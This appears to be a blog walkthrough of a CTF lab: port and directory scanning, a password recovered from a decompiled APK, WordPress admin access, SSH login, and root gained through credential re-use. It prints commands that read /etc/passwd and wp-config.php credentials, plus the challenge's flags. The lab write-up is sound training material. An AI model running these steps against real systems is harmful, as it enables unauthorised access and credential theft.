HIH | HAC_CTF

In this post, I demonstrate the steps I took to fully compromise the host provided in the CTF challenge by the Hackers Improve Here community.

2 months ago   •   10 min read

By 0xBEN
Table of contents

Nmap Results

# Nmap 7.92 scan initiated Mon Jul 18 12:13:43 2022 as: nmap -T5 -p- -oA scan hacctf.local
Nmap scan report for hacctf.local (10.9.9.49)
Host is up (0.00031s latency).
Not shown: 65528 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
10250/tcp open  unknown
10257/tcp open  unknown
10259/tcp open  unknown
16443/tcp open  unknown
25000/tcp open  icl-twobase1

# Nmap done at Mon Jul 18 12:13:45 2022 -- 1 IP address (1 host up) scanned in 2.43 seconds





Service Enumeration

TCP/80

As part of the challenge, the CTF creator instructed participants to add hacctf.local to their local hosts file. After adding the hosts entry and evaluating the nmap results, I decide to zero in on TCP/80 , since that's usually a reliable entry point.

Gobuster Enumeration

gobuster dir -u http://hacctf.local -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php,html -o gobuster-enum.txt

/.htaccess            (Status: 403) [Size: 277]
/.htaccess.php        (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess.html       (Status: 403) [Size: 277]
/.htpasswd.php        (Status: 403) [Size: 277]
/.htpasswd.html       (Status: 403) [Size: 277]
/assets               (Status: 301) [Size: 313] [--> http://hacctf.local/assets/]
/index.html           (Status: 200) [Size: 1156]                                 
/robots.txt           (Status: 200) [Size: 31]                                   
/server-status        (Status: 403) [Size: 277]                                  
/wordpress            (Status: 301) [Size: 316] [--> http://hacctf.local/wordpress/]

curl -s http://hacctf.local/robots.txt

/creds.html
/supersecret.html
Hmm... redirect to YouTube
Another redirect to YouTube?





Wordpress

Seems like there should be some place to download this app and analyze it. Let's take a look at the /assets folder discovered above in the Gobuster enumeration.

Download the APK file and decompile it for inspection.

Try a case-insensitive search for the keyword password in the decompile directory.

The file ./res/values/strings.xml looks most interesting to me, since it seems like it could contain a hard-coded value left there by the developer.

If I had to guess, this is likely the logon password for the WordPress installation. The username for the WordPress installation should match the article author – admin. Let's see if I can log into the WordPress admin panel at http://hacctf.local/wp-admin .

I'm in.

I take a look around and initially look at the plugins to see if there is a writable plugin where I can insert a PHP reverse shell, but it doesn't look like the files are writable.

Next, I take a look at the posts and find a draft post.





Exploit

An in-development Android application – exposed in a publicly available web directory – yielded a hard-coded password. Due to credential re-use, this exposed the admin interface of the local WordPress installation, which contained a user credential for SSH access.

I should be able to SSH as hailey .

ssh hailey@hacctf.local





Post-Exploit Enumeration

Run /bin/bash to get a better shell.

Current User

Click to expand
$ id
uid=1002(hailey) gid=1002(hailey) groups=1002(hailey)
$ groups
hailey
$ sudo -v
Sorry, user hailey may not run sudo on hac-ctf.



OS & Kernel

Click to expand
hailey@hac-ctf:~$ cat /etc/os-release 
NAME="Ubuntu"
VERSION="20.04.4 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.4 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
hailey@hac-ctf:~$ uname -a
Linux hac-ctf 5.4.0-110-generic #124-Ubuntu SMP Thu Apr 14 19:46:19 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux



Users

Click to expand
hailey@hac-ctf:~$ cat /etc/passwd | grep -E '100\w'
hac:x:1000:1000:hac:/home/hac:/bin/bash
ftpuser:x:1001:1001::/home/ftpuser:/bin/sh
hailey:x:1002:1002::/home/hailey:/bin/sh
zara:x:1003:1003::/home/zara:/bin/sh



Groups

Click to expand
hailey@hac-ctf:~$ cat /etc/group | grep -E '100\w'
hac:x:1000:
ftpuser:x:1001:
hailey:x:1002:
zara:x:1003:



Network

Interfaces
ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
    link/ether 3a:9b:bf:76:73:50 brd ff:ff:ff:ff:ff:ff


ARP Table
N/A


Routes
N/A


Open Ports
ss -tanup | grep -i listen | grep 127\.0\.0\.1
tcp   LISTEN    0      70              127.0.0.1:33060            0.0.0.0:*
tcp   LISTEN    0      4096            127.0.0.1:10248            0.0.0.0:*
tcp   LISTEN    0      4096            127.0.0.1:10249            0.0.0.0:*
tcp   LISTEN    0      151             127.0.0.1:3306             0.0.0.0:*
tcp   LISTEN    0      4096            127.0.0.1:10256            0.0.0.0:*
tcp   LISTEN    0      4096            127.0.0.1:19001            0.0.0.0:*
tcp   LISTEN    0      4096            127.0.0.1:39385            0.0.0.0:*
tcp   LISTEN    0      4096            127.0.0.1:1338             0.0.0.0:*


Ping Sweep
N/A



Processes

Click to expand
root         722  0.0  0.3 239292  5920 ?        Ssl  16:12   0:00 /usr/lib/accountsservice/accounts-daemon
root         728  0.0  0.1   6812  2620 ?        Ss   16:12   0:00 /usr/sbin/cron -f
root         734  0.0  0.1  81824  3232 ?        Ssl  16:12   0:00 /usr/sbin/irqbalance --foreground
root         738  0.0  0.6  29656 12640 ?        Ss   16:12   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root         740  0.0  0.2 236436  5596 ?        Ssl  16:12   0:00 /usr/lib/policykit-1/polkitd --no-debug
root         746  0.0  0.1   7500  3348 ?        Ss   16:12   0:02 /bin/bash /snap/microk8s/3272/apiservice-kicker
root         748  0.0  0.1   6972  3028 ?        Ss   16:12   0:00 /bin/bash /snap/microk8s/3272/run-cluster-agent-with-args
root         749  0.5  1.0 1495428 19932 ?       Ssl  16:12   0:14 /snap/microk8s/3272/bin/containerd --config /var/snap/microk8s/3272/args/containerd.toml --root /var/snap/microk8s/common/var/lib/containerd --state /var/snap/microk8s/common/run/containerd --address /var/snap/microk8s/common/run/containerd.sock
root         754  3.4 11.2 1776280 217396 ?      Ssl  16:12   1:34 /snap/microk8s/3272/bin/k8s-dqlite --storage-dir=/var/snap/microk8s/3272/var/kubernetes/backend/ --listen=unix:///var/snap/microk8s/3272/var/kubernetes/backend/kine.sock:12379
root         758  8.1 20.7 2384368 400448 ?      Ssl  16:12   3:45 /snap/microk8s/3272/kubelite --scheduler-args-file=/var/snap/microk8s/3272/args/kube-scheduler --controller-manager-args-file=/var/snap/microk8s/3272/args/kube-controller-manager --proxy-args-file=/var/snap/microk8s/3272/args/kube-proxy --kubelet-args-file=/var/snap/microk8s/3272/args/kubelet --apiserver-args-file=/var/snap/microk8s/3272/args/kube-apiserver --kubeconfig-file=/var/snap/microk8s/3272/credentials/client.config --start-control-plane=true
root         763  0.0  0.0   4644   112 ?        Ss   16:12   0:00 /bin/sh /snap/nextcloud/31033/bin/delay-on-failure mdns-publisher nextcloud
root         764  0.0  0.0   4644  1104 ?        Ss   16:12   0:00 /bin/sh -e /snap/nextcloud/31033/bin/start_mysql
root         765  0.0  0.0   4644   964 ?        Ss   16:12   0:00 /bin/sh /snap/nextcloud/31033/bin/nextcloud-cron
root         766  0.0  0.0   4644  1088 ?        Ss   16:12   0:00 /bin/sh -e /snap/nextcloud/31033/bin/nextcloud-fixer
root         767  0.0  0.0   4644  1004 ?        Ss   16:12   0:00 /bin/sh /snap/nextcloud/31033/bin/start-php-fpm
root         768  0.0  0.0   4644   836 ?        Ss   16:12   0:00 /bin/sh /snap/nextcloud/31033/bin/start-redis-server
root         769  0.0  0.0   4644  1052 ?        Ss   16:12   0:00 /bin/sh /snap/nextcloud/31033/bin/renew-certs
root         770  0.2  1.2 948284 23372 ?        Ssl  16:12   0:07 /usr/lib/snapd/snapd
root         772  0.0  0.3  16612  7260 ?        Ss   16:12   0:00 /lib/systemd/systemd-logind
root         774  0.0  0.4 394880  7956 ?        Ssl  16:12   0:00 /usr/lib/udisks2/udisksd
root         786  0.0  0.0      0     0 ?        I    16:12   0:00 [kworker/0:4-kdmflush]
root         807  0.0  0.0   5828  1628 tty1     Ss+  16:12   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root         885  0.0  0.2  12172  5736 ?        Ss   16:12   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root         934  0.0  0.2 314456  5336 ?        Ssl  16:12   0:00 /usr/sbin/ModemManager
root         953  0.0  0.6 107912 11932 ?        Ssl  16:12   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root        1094  0.0  0.8 228224 15668 ?        Ss   16:12   0:00 /usr/sbin/apache2 -k start
root        1314  0.0  0.2 1101752 4740 ?        Sl   16:12   0:00 /snap/microk8s/3272/bin/cluster-agent --bind 0.0.0.0:25000 --keyfile /var/snap/microk8s/3272/certs/server.key --certfile /var/snap/microk8s/3272/certs/server.crt --timeout 240
root        1399  0.0  0.1 1080108 3624 ?        Sl   16:12   0:00 mdns-publisher nextcloud
root        1520  0.1  0.1  59844  3148 ?        Sl   16:12   0:04 redis-server unixsocket:/tmp/sockets/redis.sock
root        1647  0.0  0.0   2488   580 ?        S    16:12   0:00 bpfilter_umh
root        1917  0.0  0.0   4644   804 ?        S    16:12   0:00 /bin/sh /snap/nextcloud/31033/bin/mysqld_safe --defaults-file=/snap/nextcloud/31033/my.cnf --datadir=/var/snap/nextcloud/31033/mysql --pid-file=/tmp/pids/mysql.pid --lc-messages-dir=/snap/nextcloud/31033/share --socket=/tmp/sockets/mysql.sock
root        2176  0.2  6.1 1555768 117772 ?      Sl   16:12   0:06 /snap/nextcloud/31033/bin/mysqld --defaults-file=/snap/nextcloud/31033/my.cnf --basedir=/snap/nextcloud/31033 --datadir=/var/snap/nextcloud/31033/mysql --plugin-dir=/snap/nextcloud/31033/lib/plugin --lc-messages-dir=/snap/nextcloud/31033/share --log-error=../logs/mysql_errors.log --pid-file=/tmp/pids/mysql.pid --socket=/tmp/sockets/mysql.sock
root        2187  0.0  0.0      0     0 ?        I<   16:12   0:00 [dio/dm-0]
root        2249  0.0  0.0   4548   632 ?        S    16:12   0:00 sleep 1d
root        2343  0.0  0.8 341208 17188 ?        Ss   16:12   0:00 php-fpm: master process (/snap/nextcloud/31033/config/php/php-fpm.conf)
root       30452  0.0  0.0      0     0 ?        I    16:42   0:00 [kworker/u4:2-events_unbound]
root       31651  0.0  0.0      0     0 ?        I    16:44   0:00 [kworker/0:0-events]
root       34058  0.0  0.0      0     0 ?        I    16:48   0:00 [kworker/u4:1-events_power_efficient]
root       35097  0.0  0.4  13924  8700 ?        Ss   16:49   0:00 sshd: hailey [priv]
hailey     35119  0.0  0.4  18500  9012 ?        Ss   16:49   0:00 /lib/systemd/systemd --user
root       35122  0.0  0.0      0     0 ?        I    16:49   0:00 [kworker/1:0-events]
hailey     35124  0.0  0.1 169012  3592 ?        S    16:49   0:00 (sd-pam)
hailey     35280  0.0  0.2  13924  5664 ?        S    16:49   0:00 sshd: hailey@pts/0
hailey     35281  0.0  0.0   2608  1668 pts/0    Ss   16:49   0:00 -sh
hailey     36235  0.0  0.2   8524  5340 pts/0    S    16:51   0:00 /bin/bash
root       38730  0.0  0.0      0     0 ?        I    16:54   0:00 [kworker/0:1-kdmflush]
root       39617  0.0  0.0      0     0 ?        I    16:56   0:00 [kworker/1:1]
root       40881  0.0  0.0   4548   828 ?        S    16:58   0:00 sleep 5m
root       40913  0.0  0.0      0     0 ?        I    16:58   0:00 [kworker/u4:0-events_unbound]
root       41427  0.0  0.0   7520   240 ?        S    16:58   0:00 sleep 5
root       41435  0.0  0.0   4548   836 ?        S    16:58   0:00 sleep 1
root       41436  0.0  0.0   4548   836 ?        S    16:58   0:00 sleep 1
hailey     41437  0.0  0.1   8888  3180 pts/0    R+   16:58   0:00 ps aux



Scheduled Tasks

Click to expand
None



Interesting Files

/var/www/html/wordpress/wp-config.php
/** MySQL database username */
define( 'DB_USER', 'hac' );

/** MySQL database password */
define( 'DB_PASSWORD', 'supersecurepassword' );





Privilege Escalation

World-readable WordPress configuration file has the credentials of the database administrator account. This user also happens to be the system administrator, and due to credential re-use, I am able to switch user and achieve passwordless sudo.





Persistence

N/A





Flags

Hailey
hac{4NDr01D_4ND_w0RdPr355_801_1337}


Root
hac{w3lL_doN3_Ama21N9_h3K3r_aNDRo1D_n_LUA_fuN}

Judging by the flag, I achieved root via an uninteded path (seems like Lua script should have been used somewhere). Oh well, root is root.

Spread the word

Keep reading